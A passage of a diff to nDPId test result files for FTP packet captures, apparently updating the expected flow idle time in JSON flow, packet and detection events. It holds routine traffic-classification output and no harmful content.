@@ -1,23 +1,23 @@ 00454{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"ftp.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00540{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"ftp.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1552590234892} -00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ftp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1552590234892,"flow_last_seen":1552590234892,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1552590234892,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50694,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ftp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1552590234892,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1552590234892,"pkt":"EBMx8Tl2xCwDBkn+CABFAABAAABAAEAGAADAqAHUWoJGScYGABWjI5ftAAAAALAC\/\/9jegAAAgQFtAEDAwUBAQgKO1eYmQAAAAAEAgAA"} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ftp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1552590234919,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1552590234919,"pkt":"xCwDBkn+EBMx8Tl2CABFAAA8AABAADYG4XRagkZJwKgB1AAVxgZYKsHSoyOX7qASqbA+KAAAAgQFrAQCCAoSZ\/tNO1eYmQEDAw4="} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ftp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1552590234919,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1552590234919,"pkt":"EBMx8Tl2xCwDBkn+CABFAAA0AABAAEAGAADAqAHUWoJGScYGABWjI5fuWCrB04AQECxjbgAAAQEICjtXmLQSZ\/tN"} -00821{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"ftp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1552590234892,"flow_last_seen":1552590235066,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":106,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1552590235066,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50694,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": 
{"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"anonymous","password":"NcFTP@","auth_failed":0}} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"ftp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1552590236580,"flow_last_seen":1552590236580,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1552590236580,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50695,"dst_port":25685,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"ftp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1552590236580,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1552590236580,"pkt":"EBMx8Tl2xCwDBkn+CABFAABAAABAAEAGAADAqAHUWoJGScYHZFXuwKKMAAAAALAC\/\/9jegAAAgQFtAEDAwUBAQgKO1efIQAAAAAEAgAA"} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"ftp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1552590236608,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1552590236608,"pkt":"xCwDBkn+EBMx8Tl2CABFAAA8AABAADYG4XRagkZJwKgB1GRVxgdmK2Nw7sCijaASqbDL3QAAAgQFrAQCCAoSZ\/zzO1efIQEDAw4="} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"ftp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1552590236608,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1552590236608,"pkt":"EBMx8Tl2xCwDBkn+CABFAAA0AABAAEAGAADAqAHUWoJGScYHZFXuwKKNZitjcYAQECxjbgAAAQEICjtXnzkSZ\/zz"} -00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"ftp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1552590236580,"flow_last_seen":1552590236637,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1205,"flow_tot_l4_payload_len":1205,"flow_avg_l4_payload_len":301,"midstream":0,"thread_ts_msec":1552590236637,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50695,"dst_port":25685,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"FTP_DATA","breed":"Acceptable","category":"Download"}} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":66,"source":"ftp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1552590241545,"flow_last_seen":1552590241545,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1552590241545,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50696,"dst_port":24523,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"ftp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1552590241545,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1552590241545,"pkt":"EBMx8Tl2xCwDBkn+CABFAABAAABAAEAGAADAqAHUWoJGScYIX8sNBxpOAAAAALAC\/\/9jegAAAgQFtAEDAwUBAQgKO1eyYgAAAAAEAgAA"} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"ftp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1552590241573,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1552590241573,"pkt":"xCwDBkn+EBMx8Tl2CABFAAA8AABAADYG4XRagkZJwKgB1F\/LxggMTnkwDQcaT6ASqbBmYgAAAgQFrAQCCAoSaAHMO1eyYgEDAw4="} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"ftp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1552590241573,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1552590241573,"pkt":"EBMx8Tl2xCwDBkn+CABFAAA0AABAAEAGAADAqAHUWoJGScYIX8sNBxpPDE55MYAQECxjbgAAAQEICjtXsn0SaAHM"} -00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":100,"source":"ftp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1552590241545,"flow_last_seen":1552590241639,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":24480,"flow_avg_l4_payload_len":765,"midstream":0,"thread_ts_msec":1552590241639,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50696,"dst_port":24523,"l4_proto":"tcp","ndpi": 
{"proto":"Unknown","breed":"Unrated"}} -00640{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1192,"source":"ftp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1115,"flow_first_seen":1552590241545,"flow_last_seen":1552590241878,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1048576,"flow_avg_l4_payload_len":940,"midstream":0,"thread_ts_msec":1552590243371,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50696,"dst_port":24523,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} -00800{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1192,"source":"ftp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":68,"flow_first_seen":1552590234892,"flow_last_seen":1552590243371,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":241,"flow_tot_l4_payload_len":1063,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1552590243371,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50694,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"}} 
-00826{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1192,"source":"ftp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1552590236580,"flow_last_seen":1552590236666,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1205,"flow_tot_l4_payload_len":1205,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1552590243371,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50695,"dst_port":25685,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"FTP_DATA","breed":"Acceptable","category":"Download"}} +00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ftp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1552590234892,"flow_last_seen":1552590234892,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1552590234892,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50694,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ftp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1552590234892,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1552590234892,"pkt":"EBMx8Tl2xCwDBkn+CABFAABAAABAAEAGAADAqAHUWoJGScYGABWjI5ftAAAAALAC\/\/9jegAAAgQFtAEDAwUBAQgKO1eYmQAAAAAEAgAA"} 
+00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ftp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1552590234919,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1552590234919,"pkt":"xCwDBkn+EBMx8Tl2CABFAAA8AABAADYG4XRagkZJwKgB1AAVxgZYKsHSoyOX7qASqbA+KAAAAgQFrAQCCAoSZ\/tNO1eYmQEDAw4="} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ftp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1552590234919,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1552590234919,"pkt":"EBMx8Tl2xCwDBkn+CABFAAA0AABAAEAGAADAqAHUWoJGScYGABWjI5fuWCrB04AQECxjbgAAAQEICjtXmLQSZ\/tN"} +00821{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"ftp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1552590234892,"flow_last_seen":1552590235066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":106,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1552590235066,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50694,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"anonymous","password":"NcFTP@","auth_failed":0}} 
+00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"ftp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1552590236580,"flow_last_seen":1552590236580,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1552590236580,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50695,"dst_port":25685,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"ftp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1552590236580,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1552590236580,"pkt":"EBMx8Tl2xCwDBkn+CABFAABAAABAAEAGAADAqAHUWoJGScYHZFXuwKKMAAAAALAC\/\/9jegAAAgQFtAEDAwUBAQgKO1efIQAAAAAEAgAA"} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"ftp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1552590236608,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1552590236608,"pkt":"xCwDBkn+EBMx8Tl2CABFAAA8AABAADYG4XRagkZJwKgB1GRVxgdmK2Nw7sCijaASqbDL3QAAAgQFrAQCCAoSZ\/zzO1efIQEDAw4="} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"ftp.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1552590236608,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1552590236608,"pkt":"EBMx8Tl2xCwDBkn+CABFAAA0AABAAEAGAADAqAHUWoJGScYHZFXuwKKNZitjcYAQECxjbgAAAQEICjtXnzkSZ\/zz"} +00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"ftp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1552590236580,"flow_last_seen":1552590236637,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1205,"flow_tot_l4_payload_len":1205,"flow_avg_l4_payload_len":301,"midstream":0,"thread_ts_msec":1552590236637,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50695,"dst_port":25685,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"FTP_DATA","breed":"Acceptable","category":"Download"}} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":66,"source":"ftp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1552590241545,"flow_last_seen":1552590241545,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1552590241545,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50696,"dst_port":24523,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"ftp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1552590241545,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1552590241545,"pkt":"EBMx8Tl2xCwDBkn+CABFAABAAABAAEAGAADAqAHUWoJGScYIX8sNBxpOAAAAALAC\/\/9jegAAAgQFtAEDAwUBAQgKO1eyYgAAAAAEAgAA"} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"ftp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1552590241573,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1552590241573,"pkt":"xCwDBkn+EBMx8Tl2CABFAAA8AABAADYG4XRagkZJwKgB1F\/LxggMTnkwDQcaT6ASqbBmYgAAAgQFrAQCCAoSaAHMO1eyYgEDAw4="} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"ftp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1552590241573,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1552590241573,"pkt":"EBMx8Tl2xCwDBkn+CABFAAA0AABAAEAGAADAqAHUWoJGScYIX8sNBxpPDE55MYAQECxjbgAAAQEICjtXsn0SaAHM"} +00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":100,"source":"ftp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1552590241545,"flow_last_seen":1552590241639,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":24480,"flow_avg_l4_payload_len":765,"midstream":0,"thread_ts_msec":1552590241639,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50696,"dst_port":24523,"l4_proto":"tcp","ndpi": 
{"proto":"Unknown","breed":"Unrated"}} +00640{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1192,"source":"ftp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1115,"flow_first_seen":1552590241545,"flow_last_seen":1552590241878,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1048576,"flow_avg_l4_payload_len":940,"midstream":0,"thread_ts_msec":1552590243371,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50696,"dst_port":24523,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} +00800{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1192,"source":"ftp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":68,"flow_first_seen":1552590234892,"flow_last_seen":1552590243371,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":241,"flow_tot_l4_payload_len":1063,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1552590243371,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50694,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"}} 
+00826{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1192,"source":"ftp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1552590236580,"flow_last_seen":1552590236666,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1205,"flow_tot_l4_payload_len":1205,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1552590243371,"l3_proto":"ip4","src_ip":"192.168.1.212","dst_ip":"90.130.70.73","src_port":50695,"dst_port":25685,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"FTP_DATA","breed":"Acceptable","category":"Download"}} 00558{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1192,"source":"ftp.pcap","alias":"nDPId-test","packets-captured":1192,"packets-processed":1192,"total-skipped-flows":0,"total-l4-data-len":1050844,"total-not-detected-flows":1,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":3,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":21,"global_ts_msec":1552590243371} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 1192/1192 diff --git a/test/results/ftp_failed.pcap.out b/test/results/ftp_failed.pcap.out index 91974a1a2..02ed9c6b1 100644 --- a/test/results/ftp_failed.pcap.out +++ b/test/results/ftp_failed.pcap.out 
@@ -1,11 +1,11 @@ 00461{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"ftp_failed.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00547{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"ftp_failed.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1574361625864} -00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ftp_failed.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1574361625864,"flow_last_seen":1574361625864,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1574361625864,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:192:12:193:11","dst_ip":"2a00:800:1010::1","src_port":44724,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ftp_failed.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1574361625864,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1574361625864,"pkt":"9LUv\/K\/wZABqYzXMht1gC5eXACgGQCoADUAAAQADAZIAEgGTABEqAAgAEBAAAAAAAAAAAAABrrQAFZk3QbUAAAAAoAJwgHzLAAACBAWgBAIICpYFXqIAAAAAAQMDBw=="} -00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ftp_failed.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1574361625878,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1574361625878,"pkt":"ZABqYzXM9LUv\/K\/wht1gC1mOACgGOioACAAQEAAAAAAAAAAAAAEqAA1AAAEAAwGSABIBkwARABWutHAVBmyZN0G2oBL\/\/zbpAAACBAWgBAIIClbTSMOWBV6iAQMDDg=="} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ftp_failed.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1574361625878,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1574361625878,"pkt":"9LUv\/K\/wZABqYzXMht1gC5eXACAGQCoADUAAAQADAZIAEgGTABEqAAgAEBAAAAAAAAAAAAABrrQAFZk3QbZwFQZtgBAA4XzDAAABAQgKlgVesFbTSMM="} 
